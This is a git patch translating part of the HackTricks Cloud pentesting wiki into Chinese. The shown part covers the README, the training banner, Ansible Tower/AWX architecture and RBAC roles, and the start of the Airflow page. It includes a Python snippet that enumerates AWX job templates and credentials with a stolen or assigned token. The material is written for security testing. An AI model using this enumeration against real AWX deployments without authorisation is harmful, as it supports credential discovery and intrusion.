From 1e9dcd664bb94327e13c3db3f982470042e28f17 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 31 Dec 2024 20:05:38 +0000 Subject: [PATCH] Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/ --- src/README.md | 16 +- src/SUMMARY.md | 2 + src/banners/hacktricks-training.md | 16 +- ...ower-awx-automation-controller-security.md | 156 ++- .../apache-airflow-security/README.md | 152 ++- .../airflow-configuration.md | 112 +- .../apache-airflow-security/airflow-rbac.md | 32 +- src/pentesting-ci-cd/atlantis-security.md | 286 +++-- src/pentesting-ci-cd/circleci-security.md | 312 +++-- .../cloudflare-security/README.md | 118 +- .../cloudflare-security/cloudflare-domains.md | 138 ++- .../cloudflare-zero-trust-network.md | 46 +- .../concourse-security/README.md | 20 +- .../concourse-architecture.md | 22 +- .../concourse-enumeration-and-attacks.md | 312 +++-- .../concourse-lab-creation.md | 144 ++- src/pentesting-ci-cd/gitea-security/README.md | 136 +-- .../gitea-security/basic-gitea-information.md | 92 +- .../github-security/README.md | 256 ++-- .../abusing-github-actions/README.md | 578 +++++---- .../gh-actions-artifact-poisoning.md | 5 - .../gh-actions-cache-poisoning.md | 7 +- .../gh-actions-context-script-injections.md | 7 +- .../accessible-deleted-data-in-github.md | 40 +- .../basic-github-information.md | 291 +++-- .../jenkins-security/README.md | 318 +++-- .../basic-jenkins-information.md | 62 +- ...itrary-file-read-to-rce-via-remember-me.md | 138 ++- .../jenkins-dumping-secrets-from-groovy.md | 78 +- ...jenkins-rce-creating-modifying-pipeline.md | 40 +- .../jenkins-rce-creating-modifying-project.md | 36 +- .../jenkins-rce-with-groovy-script.md | 38 +- src/pentesting-ci-cd/okta-security/README.md | 112 +- .../okta-security/okta-hardening.md | 196 ++-- .../pentesting-ci-cd-methodology.md | 96 +- .../serverless.com-security.md | 1028 ++++++++--------- src/pentesting-ci-cd/supabase-security.md | 112 +- src/pentesting-ci-cd/terraform-security.md | 294 +++-- src/pentesting-ci-cd/todo.md | 8 +- .../travisci-security/README.md | 54 +- .../basic-travisci-information.md | 64 +- src/pentesting-ci-cd/vercel-security.md | 540 +++++---- src/pentesting-cloud/aws-security/README.md | 204 ++-- .../aws-basic-information/README.md | 392 +++---- .../aws-federation-abuse.md | 158 ++- .../aws-permissions-for-a-pentest.md | 24 +- .../aws-security/aws-persistence/README.md | 7 +- .../aws-api-gateway-persistence.md | 20 +- .../aws-cognito-persistence.md | 30 +- .../aws-dynamodb-persistence.md | 62 +- .../aws-persistence/aws-ec2-persistence.md | 52 +- .../aws-persistence/aws-ecr-persistence.md | 104 +- .../aws-persistence/aws-ecs-persistence.md | 102 +- .../aws-persistence/aws-efs-persistence.md | 16 +- .../aws-elastic-beanstalk-persistence.md | 80 +- .../aws-persistence/aws-iam-persistence.md | 56 +- .../aws-persistence/aws-kms-persistence.md | 30 +- .../aws-lambda-persistence/README.md | 52 +- .../aws-abusing-lambda-extensions.md | 36 +- .../aws-lambda-layers-persistence.md | 98 +- .../aws-lightsail-persistence.md | 30 +- .../aws-persistence/aws-rds-persistence.md | 22 +- .../aws-persistence/aws-s3-persistence.md | 18 +- .../aws-secrets-manager-persistence.md | 50 +- .../aws-persistence/aws-sns-persistence.md | 120 +- .../aws-persistence/aws-sqs-persistence.md | 44 +- .../aws-persistence/aws-ssm-perssitence.md | 5 - .../aws-step-functions-persistence.md | 10 +- .../aws-persistence/aws-sts-persistence.md | 134 +-- .../aws-post-exploitation/README.md | 7 +- 
.../aws-api-gateway-post-exploitation.md | 76 +- .../aws-cloudfront-post-exploitation.md | 28 +- .../aws-codebuild-post-exploitation/README.md | 54 +- .../aws-codebuild-token-leakage.md | 206 ++-- .../aws-control-tower-post-exploitation.md | 10 +- .../aws-dlm-post-exploitation.md | 154 ++- .../aws-dynamodb-post-exploitation.md | 292 ++--- .../README.md | 602 +++++----- .../aws-ebs-snapshot-dump.md | 72 +- .../aws-malicious-vpc-mirror.md | 12 +- .../aws-ecr-post-exploitation.md | 56 +- .../aws-ecs-post-exploitation.md | 44 +- .../aws-efs-post-exploitation.md | 34 +- .../aws-eks-post-exploitation.md | 138 +-- ...aws-elastic-beanstalk-post-exploitation.md | 48 +- .../aws-iam-post-exploitation.md | 98 +- .../aws-kms-post-exploitation.md | 140 +-- .../aws-lambda-post-exploitation/README.md | 16 +- .../aws-warm-lambda-persistence.md | 50 +- .../aws-lightsail-post-exploitation.md | 22 +- .../aws-organizations-post-exploitation.md | 8 +- .../aws-rds-post-exploitation.md | 58 +- .../aws-s3-post-exploitation.md | 34 +- .../aws-secrets-manager-post-exploitation.md | 40 +- .../aws-ses-post-exploitation.md | 48 +- .../aws-sns-post-exploitation.md | 46 +- .../aws-sqs-post-exploitation.md | 50 +- ...sso-and-identitystore-post-exploitation.md | 12 +- .../aws-stepfunctions-post-exploitation.md | 42 +- .../aws-sts-post-exploitation.md | 50 +- .../aws-vpn-post-exploitation.md | 8 +- .../aws-privilege-escalation/README.md | 20 +- .../aws-apigateway-privesc.md | 52 +- .../aws-chime-privesc.md | 6 +- .../aws-cloudformation-privesc/README.md | 94 +- ...stack-and-cloudformation-describestacks.md | 124 +- .../aws-codebuild-privesc.md | 250 ++-- .../aws-codepipeline-privesc.md | 20 +- .../aws-codestar-privesc/README.md | 60 +- ...ateproject-codestar-associateteammember.md | 146 ++- .../iam-passrole-codestar-createproject.md | 106 +- .../aws-cognito-privesc.md | 274 ++--- .../aws-datapipeline-privesc.md | 82 +- .../aws-directory-services-privesc.md | 22 +- .../aws-dynamodb-privesc.md | 8 +- .../aws-ebs-privesc.md | 16 +- .../aws-ec2-privesc.md | 206 ++-- .../aws-ecr-privesc.md | 108 +- .../aws-ecs-privesc.md | 230 ++-- .../aws-efs-privesc.md | 90 +- .../aws-elastic-beanstalk-privesc.md | 140 +-- .../aws-emr-privesc.md | 44 +- .../aws-privilege-escalation/aws-gamelift.md | 12 +- .../aws-glue-privesc.md | 48 +- .../aws-iam-privesc.md | 194 ++-- .../aws-kms-privesc.md | 124 +- .../aws-lambda-privesc.md | 216 ++-- .../aws-lightsail-privesc.md | 110 +- .../aws-mediapackage-privesc.md | 14 +- .../aws-mq-privesc.md | 26 +- .../aws-msk-privesc.md | 14 +- .../aws-organizations-prinvesc.md | 12 +- .../aws-rds-privesc.md | 116 +- .../aws-redshift-privesc.md | 48 +- .../aws-s3-privesc.md | 222 ++-- .../aws-sagemaker-privesc.md | 80 +- .../aws-secrets-manager-privesc.md | 40 +- .../aws-sns-privesc.md | 24 +- .../aws-sqs-privesc.md | 24 +- .../aws-ssm-privesc.md | 72 +- .../aws-sso-and-identitystore-privesc.md | 78 +- .../aws-stepfunctions-privesc.md | 282 ++--- .../aws-sts-privesc.md | 122 +- .../aws-workdocs-privesc.md | 26 +- .../eventbridgescheduler-privesc.md | 48 +- ...acm-pca-issuecertificate-acm-pca-getcer.md | 26 +- .../aws-security/aws-services/README.md | 42 +- .../aws-services/aws-api-gateway-enum.md | 178 ++- ...m-and-private-certificate-authority-pca.md | 20 +- .../aws-cloudformation-and-codestar-enum.md | 22 +- .../aws-services/aws-cloudfront-enum.md | 20 +- .../aws-services/aws-cloudhsm-enum.md | 69 +- .../aws-services/aws-codebuild-enum.md | 32 +- .../aws-services/aws-cognito-enum/README.md | 38 +- 
.../cognito-identity-pools.md | 122 +- .../aws-cognito-enum/cognito-user-pools.md | 444 ++++--- ...e-codepipeline-codebuild-and-codecommit.md | 40 +- .../aws-directory-services-workdocs-enum.md | 70 +- .../aws-services/aws-documentdb-enum.md | 14 +- .../aws-services/aws-dynamodb-enum.md | 104 +- .../README.md | 166 ++- .../aws-nitro-enum.md | 170 ++- ...ws-vpc-and-networking-basic-information.md | 212 ++-- .../aws-security/aws-services/aws-ecr-enum.md | 68 +- .../aws-security/aws-services/aws-ecs-enum.md | 50 +- .../aws-security/aws-services/aws-efs-enum.md | 96 +- .../aws-security/aws-services/aws-eks-enum.md | 22 +- .../aws-elastic-beanstalk-enum.md | 76 +- .../aws-services/aws-elasticache.md | 8 +- .../aws-security/aws-services/aws-emr-enum.md | 58 +- .../aws-security/aws-services/aws-iam-enum.md | 132 +-- .../aws-kinesis-data-firehose-enum.md | 22 +- .../aws-security/aws-services/aws-kms-enum.md | 154 ++- .../aws-services/aws-lambda-enum.md | 86 +- .../aws-services/aws-lightsail-enum.md | 24 +- .../aws-security/aws-services/aws-mq-enum.md | 32 +- .../aws-security/aws-services/aws-msk-enum.md | 26 +- .../aws-services/aws-organizations-enum.md | 24 +- .../aws-services/aws-other-services-enum.md | 14 +- .../aws-services/aws-redshift-enum.md | 38 +- .../aws-relational-database-rds-enum.md | 102 +- .../aws-services/aws-route53-enum.md | 18 +- .../aws-s3-athena-and-glacier-enum.md | 246 ++-- .../aws-services/aws-secrets-manager-enum.md | 22 +- .../README.md | 7 +- .../aws-cloudtrail-enum.md | 246 ++-- .../aws-cloudwatch-enum.md | 386 +++---- .../aws-config-enum.md | 52 +- .../aws-control-tower-enum.md | 24 +- .../aws-cost-explorer-enum.md | 16 +- .../aws-detective-enum.md | 8 +- .../aws-firewall-manager-enum.md | 202 ++-- .../aws-guardduty-enum.md | 130 +-- .../aws-inspector-enum.md | 244 ++-- .../aws-macie-enum.md | 82 +- .../aws-security-hub-enum.md | 36 +- .../aws-shield-enum.md | 12 +- .../aws-trusted-advisor-enum.md | 94 +- .../aws-waf-enum.md | 402 +++---- .../aws-security/aws-services/aws-ses-enum.md | 46 +- .../aws-security/aws-services/aws-sns-enum.md | 50 +- .../aws-services/aws-sqs-and-sns-enum.md | 20 +- .../aws-services/aws-stepfunctions-enum.md | 358 +++--- .../aws-security/aws-services/aws-sts-enum.md | 86 +- .../aws-services/eventbridgescheduler-enum.md | 40 +- .../aws-unauthenticated-enum-access/README.md | 64 +- .../aws-accounts-unauthenticated-enum.md | 28 +- .../aws-api-gateway-unauthenticated-enum.md | 62 +- .../aws-cloudfront-unauthenticated-enum.md | 8 +- .../aws-codebuild-unauthenticated-access.md | 22 +- .../aws-cognito-unauthenticated-enum.md | 40 +- .../aws-documentdb-enum.md | 10 +- .../aws-dynamodb-unauthenticated-access.md | 10 +- .../aws-ec2-unauthenticated-enum.md | 30 +- .../aws-ecr-unauthenticated-enum.md | 22 +- .../aws-ecs-unauthenticated-enum.md | 14 +- ...-elastic-beanstalk-unauthenticated-enum.md | 18 +- .../aws-elasticsearch-unauthenticated-enum.md | 8 +- .../aws-iam-and-sts-unauthenticated-enum.md | 186 ++- ...ity-center-and-sso-unauthenticated-enum.md | 98 +- .../aws-iot-unauthenticated-enum.md | 10 +- .../aws-kinesis-video-unauthenticated-enum.md | 8 +- .../aws-lambda-unauthenticated-access.md | 20 +- .../aws-media-unauthenticated-enum.md | 10 +- .../aws-mq-unauthenticated-enum.md | 16 +- .../aws-msk-unauthenticated-enum.md | 14 +- .../aws-rds-unauthenticated-enum.md | 22 +- .../aws-redshift-unauthenticated-enum.md | 8 +- .../aws-s3-unauthenticated-enum.md | 174 ++- .../aws-sns-unauthenticated-enum.md | 14 +- .../aws-sqs-unauthenticated-enum.md | 16 
+- src/pentesting-cloud/azure-security/README.md | 136 +-- .../az-basic-information/README.md | 494 ++++---- .../az-tokens-and-public-applications.md | 188 ++- .../azure-security/az-device-registration.md | 72 +- .../azure-security/az-enumeration-tools.md | 82 +- .../az-arc-vulnerable-gpo-deploy-script.md | 44 +- .../az-local-cloud-credentials.md | 42 +- .../az-pass-the-certificate.md | 36 +- .../az-pass-the-cookie.md | 22 +- ...g-primary-refresh-token-microsoft-entra.md | 8 +- .../az-primary-refresh-token-prt.md | 6 +- .../az-processes-memory-access-token.md | 20 +- .../az-permissions-for-a-pentest.md | 6 +- .../pentesting-cloud-methodology.md | 218 ++-- 245 files changed, 10145 insertions(+), 12880 deletions(-) diff --git a/src/README.md b/src/README.md index 01b146fd1..35cd94e16 100644 --- a/src/README.md +++ b/src/README.md @@ -1,31 +1,31 @@ # HackTricks Cloud -Reading time: {{ #reading_time }} +阅读时间: {{ #reading_time }} {{#include ./banners/hacktricks-training.md}}
-_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Hacktricks 标志和动画设计由_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ > [!TIP] -> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. +> 欢迎来到这个页面,在这里你将找到我在 **CTFs**、**真实**生活**环境**、**研究**和**阅读**研究和新闻中学到的每一个与 **CI/CD & Cloud** 相关的 **黑客技巧/技术/其他**。 ### **Pentesting CI/CD Methodology** -**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** +**在 HackTricks CI/CD 方法论中,你将找到如何对与 CI/CD 活动相关的基础设施进行渗透测试。** 阅读以下页面以获取 **介绍:** [pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) ### Pentesting Cloud Methodology -**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** +**在 HackTricks Cloud 方法论中,你将找到如何对云环境进行渗透测试。** 阅读以下页面以获取 **介绍:** [pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) ### License & Disclaimer -**Check them in:** +**请查看:** [HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) @@ -34,7 +34,3 @@ _Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.co ![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) {{#include ./banners/hacktricks-training.md}} - - - - diff --git a/src/SUMMARY.md b/src/SUMMARY.md index feae5163c..1b1d60c58 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -505,3 +505,5 @@ + + diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md index b684cee3d..50f6953db 100644 --- a/src/banners/hacktricks-training.md +++ b/src/banners/hacktricks-training.md @@ -1,17 +1,13 @@ > [!TIP] -> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +> 学习和实践 AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +> 学习和实践 GCP Hacking:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) > >
> -> Support HackTricks +> 支持 HackTricks > -> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +> - 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +> - **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +> - **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 > >
- - - - diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md index d3fbf19e5..094f41ce0 100644 --- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md +++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md @@ -2,62 +2,61 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansible’s user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Tower’s REST API and command-line interface make it simple to integrate it into current tools and workflows. +**Ansible Tower** 或其开源版本 [**AWX**](https://github.com/ansible/awx) 也被称为 **Ansible 的用户界面、仪表板和 REST API**。通过 **基于角色的访问控制**、作业调度和图形化库存管理,您可以通过现代用户界面管理您的 Ansible 基础设施。Tower 的 REST API 和命令行界面使其易于集成到当前工具和工作流程中。 -**Automation Controller is a newer** version of Ansible Tower with more capabilities. +**Automation Controller 是 Ansible Tower 的一个更新版本,具有更多功能。** -### Differences +### 差异 -According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows. +根据 [**这篇文章**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00),Ansible Tower 和 AWX 之间的主要区别在于获得的支持,Ansible Tower 具有额外的功能,如基于角色的访问控制、对自定义 API 的支持和用户定义的工作流程。 -### Tech Stack +### 技术栈 -- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs. -- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface. -- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data. -- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners. -- **Redis**: Redis serves as a cache and a backend for the task queue. +- **Web 界面**:这是用户可以管理库存、凭据、模板和作业的图形界面。它旨在直观,并提供可视化以帮助理解自动化作业的状态和结果。 +- **REST API**:您可以在 Web 界面中执行的所有操作,也可以通过 REST API 执行。这意味着您可以将 AWX/Tower 与其他系统集成或编写通常在界面中执行的操作脚本。 +- **数据库**:AWX/Tower 使用数据库(通常是 PostgreSQL)来存储其配置、作业结果和其他必要的操作数据。 +- **RabbitMQ**:这是 AWX/Tower 用于在不同组件之间通信的消息系统,特别是在 Web 服务和任务运行器之间。 +- **Redis**:Redis 作为缓存和任务队列的后端。 -### Logical Components +### 逻辑组件 -- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc. -- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.. 
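
Since everything available in the web interface is also exposed through the REST API mentioned above, a compromised token or session lets you enumerate the same objects programmatically. A minimal sketch (not from the official docs), assuming a reachable AWX/Tower instance and a valid OAuth2 token with read access; the URL and token below are placeholders:

```python
import requests

AWX_URL = "https://awx.example.com"      # placeholder target
TOKEN = "REDACTED_OAUTH2_TOKEN"          # assumed: a token with at least read access

session = requests.Session()
session.headers["Authorization"] = f"Bearer {TOKEN}"
session.verify = False  # lab setups often use self-signed certificates

def list_endpoint(path):
    """Page through an /api/v2/ collection and return every result."""
    results, url = [], f"{AWX_URL}{path}"
    while url:
        resp = session.get(url)
        resp.raise_for_status()
        data = resp.json()
        results += data.get("results", [])
        nxt = data.get("next")
        url = f"{AWX_URL}{nxt}" if nxt else None
    return results

# Job templates reveal which playbooks run against which inventories and credentials
for jt in list_endpoint("/api/v2/job_templates/"):
    print(jt["id"], jt["name"], jt.get("playbook"))

# Credential values are write-only, but names and types map out the attack surface
for cred in list_endpoint("/api/v2/credentials/"):
    print(cred["id"], cred["name"], cred["credential_type"])
```

With enough privileges the same API can also launch job templates, which means running playbooks (and therefore code) on the managed hosts.
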
-- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job. -- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run. -- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials. -- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events. -- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc. -- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed. +- **库存**:库存是一个 **主机(或节点)的集合**,可以对其 **运行作业**(Ansible 剧本)。AWX/Tower 允许您定义和分组库存,并支持动态库存,可以 **从其他系统获取主机列表**,如 AWS、Azure 等。 +- **项目**:项目本质上是一个 **Ansible 剧本的集合**,来源于 **版本控制系统**(如 Git),以便在需要时提取最新的剧本。 +- **模板**:作业模板定义 **特定剧本将如何运行**,指定 **库存**、**凭据** 和其他 **参数**。 +- **凭据**:AWX/Tower 提供了一种安全的方式来 **管理和存储秘密,如 SSH 密钥、密码和 API 令牌**。这些凭据可以与作业模板关联,以便剧本在运行时具有必要的访问权限。 +- **任务引擎**:这是魔法发生的地方。任务引擎基于 Ansible 构建,负责 **运行剧本**。作业被分派到任务引擎,然后使用指定的凭据在指定的库存上运行 Ansible 剧本。 +- **调度程序和回调**:这些是 AWX/Tower 中的高级功能,允许 **作业在特定时间调度运行**或由外部事件触发。 +- **通知**:AWX/Tower 可以根据作业的成功或失败发送通知。它支持多种通知方式,如电子邮件、Slack 消息、Webhooks 等。 +- **Ansible 剧本**:Ansible 剧本是配置、部署和编排工具。它们以自动化、可重复的方式描述系统的期望状态。剧本使用 YAML 编写,利用 Ansible 的声明性自动化语言描述需要执行的配置、任务和步骤。 -### Job Execution Flow +### 作业执行流程 -1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower. -2. **Job Initiation**: - - The user, via the Web Interface or API, initiates a job based on a **Job Template**. - - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**. - - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution. -3. **Job Queuing**: - - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ. - - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution. -4. **Job Execution**: - - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials. - - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**. - - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**. -5. **Job Results**: - - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**. 
- - Users can then view the results through the Web Interface or query them via the REST API. - - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc. -6. **External Systems Integration**: - - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more. - - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution. - - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times. +1. **用户交互**:用户可以通过 **Web 界面** 或 **REST API** 与 AWX/Tower 交互。这些提供了对 AWX/Tower 提供的所有功能的前端访问。 +2. **作业启动**: + - 用户通过 Web 界面或 API 启动基于 **作业模板** 的作业。 + - 作业模板包括对 **库存**、**项目**(包含剧本)和 **凭据** 的引用。 + - 在作业启动时,向 AWX/Tower 后端发送请求以将作业排队执行。 +3. **作业排队**: + - **RabbitMQ** 处理 Web 组件与任务运行器之间的消息传递。一旦作业启动,消息将通过 RabbitMQ 发送到任务引擎。 + - **Redis** 作为任务队列的后端,管理等待执行的排队作业。 +4. **作业执行**: + - **任务引擎** 拾取排队的作业。它从 **数据库** 中检索与作业相关的剧本、库存和凭据的必要信息。 + - 使用从相关 **项目** 中检索的 Ansible 剧本,任务引擎在指定的 **库存** 节点上使用提供的 **凭据** 运行剧本。 + - 当剧本运行时,其执行输出(日志、事实等)被捕获并存储在 **数据库** 中。 +5. **作业结果**: + - 一旦剧本完成运行,结果(成功、失败、日志)将保存到 **数据库** 中。 + - 用户可以通过 Web 界面查看结果或通过 REST API 查询结果。 + - 根据作业结果,可以发送 **通知** 以告知用户或外部系统作业的状态。通知可以是电子邮件、Slack 消息、Webhooks 等。 +6. **外部系统集成**: + - **库存** 可以从外部系统动态获取,允许 AWX/Tower 从 AWS、Azure、VMware 等来源提取主机。 + - **项目**(剧本)可以从版本控制系统中提取,确保在作业执行期间使用最新的剧本。 + - **调度程序和回调** 可用于与其他系统或工具集成,使 AWX/Tower 对外部触发器做出反应或在预定时间运行作业。 -### AWX lab creation for testing - -[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX: +### AWX 实验室创建以进行测试 +[**按照文档**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) 可以使用 docker-compose 运行 AWX: ```bash git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version @@ -83,61 +82,56 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser # Load demo data docker exec tools_awx_1 awx-manage create_preload_data ``` - ## RBAC -### Supported roles +### 支持的角色 -The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**. +最特权的角色称为 **System Administrator**。拥有此角色的任何人都可以 **修改任何内容**。 -From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one. +从 **白盒安全** 审查的角度来看,您需要 **System Auditor role**,该角色允许 **查看所有系统数据** 但不能进行任何更改。另一个选择是获取 **Organization Auditor role**,但获取前者会更好。
-Expand this to get detailed description of available roles +展开以获取可用角色的详细描述 1. **System Administrator**: - - This is the superuser role with permissions to access and modify any resource in the system. - - They can manage all organizations, teams, projects, inventories, job templates, etc. +- 这是具有访问和修改系统中任何资源权限的超级用户角色。 +- 他们可以管理所有组织、团队、项目、库存、作业模板等。 2. **System Auditor**: - - Users with this role can view all system data but cannot make any changes. - - This role is designed for compliance and oversight. +- 拥有此角色的用户可以查看所有系统数据,但不能进行任何更改。 +- 此角色旨在用于合规性和监督。 3. **Organization Roles**: - - **Admin**: Full control over the organization's resources. - - **Auditor**: View-only access to the organization's resources. - - **Member**: Basic membership in an organization without any specific permissions. - - **Execute**: Can run job templates within the organization. - - **Read**: Can view the organization’s resources. +- **Admin**: 对组织资源的完全控制。 +- **Auditor**: 仅查看组织资源的访问权限。 +- **Member**: 在组织中的基本成员身份,没有任何特定权限。 +- **Execute**: 可以在组织内运行作业模板。 +- **Read**: 可以查看组织的资源。 4. **Project Roles**: - - **Admin**: Can manage and modify the project. - - **Use**: Can use the project in a job template. - - **Update**: Can update project using SCM (source control). +- **Admin**: 可以管理和修改项目。 +- **Use**: 可以在作业模板中使用该项目。 +- **Update**: 可以使用 SCM(源代码管理)更新项目。 5. **Inventory Roles**: - - **Admin**: Can manage and modify the inventory. - - **Ad Hoc**: Can run ad hoc commands on the inventory. - - **Update**: Can update the inventory source. - - **Use**: Can use the inventory in a job template. - - **Read**: View-only access. +- **Admin**: 可以管理和修改库存。 +- **Ad Hoc**: 可以在库存上运行临时命令。 +- **Update**: 可以更新库存源。 +- **Use**: 可以在作业模板中使用库存。 +- **Read**: 仅查看访问权限。 6. **Job Template Roles**: - - **Admin**: Can manage and modify the job template. - - **Execute**: Can run the job. - - **Read**: View-only access. +- **Admin**: 可以管理和修改作业模板。 +- **Execute**: 可以运行作业。 +- **Read**: 仅查看访问权限。 7. **Credential Roles**: - - **Admin**: Can manage and modify the credentials. - - **Use**: Can use the credentials in job templates or other relevant resources. - - **Read**: View-only access. +- **Admin**: 可以管理和修改凭据。 +- **Use**: 可以在作业模板或其他相关资源中使用凭据。 +- **Read**: 仅查看访问权限。 8. **Team Roles**: - - **Member**: Part of the team but without any specific permissions. - - **Admin**: Can manage the team's members and associated resources. +- **Member**: 团队的一部分,但没有任何特定权限。 +- **Admin**: 可以管理团队成员和相关资源。 9. **Workflow Roles**: - - **Admin**: Can manage and modify the workflow. - - **Execute**: Can run the workflow. - - **Read**: View-only access. +- **Admin**: 可以管理和修改工作流。 +- **Execute**: 可以运行工作流。 +- **Read**: 仅查看访问权限。
{{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md index aac46128c..03870395f 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/README.md +++ b/src/pentesting-ci-cd/apache-airflow-security/README.md @@ -2,22 +2,21 @@ {{#include ../../banners/hacktricks-training.md}} -### Basic Information +### 基本信息 -[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications. +[**Apache Airflow**](https://airflow.apache.org) 是一个用于 **编排和调度数据管道或工作流** 